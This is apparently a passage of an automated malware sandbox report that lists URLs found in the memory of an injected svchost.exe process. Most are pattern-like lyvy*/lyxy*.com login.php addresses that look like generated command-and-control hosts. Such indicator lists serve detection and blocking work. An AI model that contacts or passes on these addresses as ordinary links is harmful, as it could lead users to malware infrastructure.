http://lyvyjox.com/login.php
Source: svchost.exe, 00000002.00000003.2796055638.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2772865274.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2805126129.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2769955415.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404121983.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2793841550.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3341799100.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2381391655.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3266427470.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2771520849.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2377032828.00000000086F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lyvylyx.com/login.php
Source: svchost.exe, 00000002.00000003.2796055638.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2391261344.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3267123963.0000000003347000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2800821291.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2793841550.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2384104652.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2384383810.00000000086FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lyvymun.com/login.php
Source: svchost.exe, 00000002.00000003.2709443016.00000000033AD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670655678.00000000033AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2673206249.0000000003393000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2671925473.00000000033AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lyvynid.com/http://qeqyqep.com/http://lymymax.com/http://gadyzib.com/
Source: svchost.exe, 00000002.00000003.2671509523.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349866379.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349127281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670315739.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670012329.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2671936852.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2738516422.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2671484952.00000000086F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lyvynid.com/login.php
Source: svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760246399.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2592000281.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3246274264.000000000870B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3403579535.000000000870D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2752639627.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2771121340.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2744373638.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670315739.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670012329.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2748851196.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2610522908.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2749199124.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582447207.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2759913760.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2573770543.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2801740808.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2768400966.0000000008705000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2738516422.00000000086F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lyvysur.com/login.php
Source: svchost.exe, 00000002.00000003.2763334143.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760246399.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353793003.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3403450959.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3265760525.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2752639627.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2771121340.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2744373638.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2748851196.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353331404.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2749199124.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2759913760.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352299692.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2801740808.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2787365873.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2351137108.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2738516422.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2764486074.00000000086F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lyvyver.com/login.php
Source: svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303334009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2553968961.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2552314103.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lyvyvix.com/login.php
Source: svchost.exe, 00000002.00000003.2432573037.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3403579535.000000000870D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202773518.0000000008693000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3393093066.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404121983.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202728385.0000000008644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2272090324.0000000008693000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404003407.0000000008783000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2434123780.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3341799100.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2432700162.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2194197284.0000000008691000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lyvywed.com/login.php
Source: svchost.exe, 00000002.00000003.2334859023.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2592000281.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332145984.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2671936852.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2640219450.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337298832.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332778027.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2333419776.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337435190.0000000008611000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2610879120.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335316915.0000000008611000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lyvywux.com/login.php
Source: svchost.exe, 00000002.00000003.2582588416.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328002527.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582641786.0000000003393000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326381294.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2580751870.00000000087AC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2581725706.0000000008785000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326465693.00000000086F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lyvyxyj.com/login.php
Source: svchost.exe, 00000002.00000002.3402132488.000000000866C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2400732439.00000000058C8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2397460144.000000000874C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2394798813.000000000873D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2397017800.00000000058C4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2396330335.000000000873D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398044993.00000000058C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2397423438.000000000874A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lyxyfan.com/
Source: svchost.exe, 00000002.00000002.3402132488.000000000866C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3281377881.000000000866F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2812761855.000000000866F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3268019512.000000000866D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lyxyfan.com/H
Source: svchost.exe, 00000002.00000003.2550145927.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2297525559.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303458870.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296517767.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2549686862.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303458885.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548641598.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558367053.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2549395486.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2305813558.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2307211585.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547272194.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2298813609.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548645821.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2301364243.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2295479426.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296451736.0000000008702000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lyxyfar.com/login.php
Source: svchost.exe, 00000002.00000003.2671509523.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2672088553.0000000008785000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349866379.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349127281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350047450.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2673206249.0000000003393000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2738837414.0000000008783000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lyxyfuj.com/login.php
Source: svchost.exe, 00000002.00000003.2671356551.000000000868F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2338991462.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2339128784.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2640219450.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2339275288.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635676013.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2338959183.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2639583106.0000000008690000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635826907.00000000086F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lyxygax.com/login.php
Source: svchost.exe, 00000002.00000003.2796055638.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2805126129.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2799115351.0000000008691000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2384269083.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2793841550.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2802098474.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3266427470.00000000087A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lyxygur.com/login.php
Source: svchost.exe, 00000002.00000003.2588418708.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332552292.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337099007.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332145984.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2336690325.0000000008692000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332778027.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2333419776.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2610879120.00000000033D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lyxyjun.com/login.php
Source: svchost.exe, 00000002.00000003.2588418708.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582588416.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334498126.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334047161.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329748670.0000000003393000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337179930.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326892101.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332145984.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582447207.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328870829.000000000868F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326381294.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334800958.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2580751870.00000000087AC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326465693.00000000086F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lyxylor.com/login.php
Source: svchost.exe, 00000002.00000003.2588418708.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337099007.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332145984.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2605904977.0000000003393000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332778027.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2333419776.00000000086FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lyxymed.com/login.php
Source: svchost.exe, 00000002.00000003.2432573037.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557475743.0000000008785000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202773518.0000000008693000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3393093066.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577719348.0000000008784000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404121983.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548810720.0000000008783000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3341799100.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2578793071.0000000008786000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2432700162.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2194197284.0000000008691000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lyxymin.com/login.php
Source: svchost.exe, 00000002.00000003.2796055638.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3246274264.000000000870B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3403579535.000000000870D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2772865274.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2805126129.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2771121340.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2769955415.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404121983.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2793841550.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2801740808.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3341799100.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3266427470.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2771520849.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2777187340.0000000008705000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lyxymix.com/login.php
Source: svchost.exe, 00000002.00000003.2357365639.00000000087B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2359008557.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2354372156.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2752503084.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352296383.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353331404.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352299692.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2745079929.0000000008783000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353878040.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352873601.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2738837414.0000000008783000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352879533.00000000086FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lyxysad.com/login.php
Source: svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303334009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2553968961.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2552314103.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557483842.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2556984027.00000000086F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lyxysun.com/login.php
Source: svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2646107568.0000000003353000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3267123963.0000000003353000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760246399.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2592000281.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3246274264.000000000870B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2813315381.0000000003353000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3393093066.0000000003353000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3403579535.000000000870D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2752639627.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321367524.0000000008691000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2771121340.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2744373638.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2750428178.0000000003353000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670315739.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670012329.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2748851196.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2788231276.0000000003353000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2610522908.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2749199124.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lyxytex.com/login.php
Source: svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2308037835.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2553968961.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2552314103.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557483842.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2302432052.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2323670952.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2556984027.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2305095010.0000000008701000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lyxyvoj.com/login.php
Source: svchost.exe, 00000002.00000003.2357365639.00000000087B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353785619.000000000878B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760246399.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2752639627.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352296383.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2744373638.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353676961.000000000878B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2748851196.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2749199124.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2759913760.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2745079929.0000000008783000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352873601.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2738837414.0000000008783000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352880774.000000000878B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lyxyvyn.com/login.php
Source: svchost.exe, 00000002.00000003.2588418708.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582588416.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326892101.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582447207.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328002527.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326381294.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2580751870.00000000087AC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326465693.00000000086F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lyxywij.com/login.php
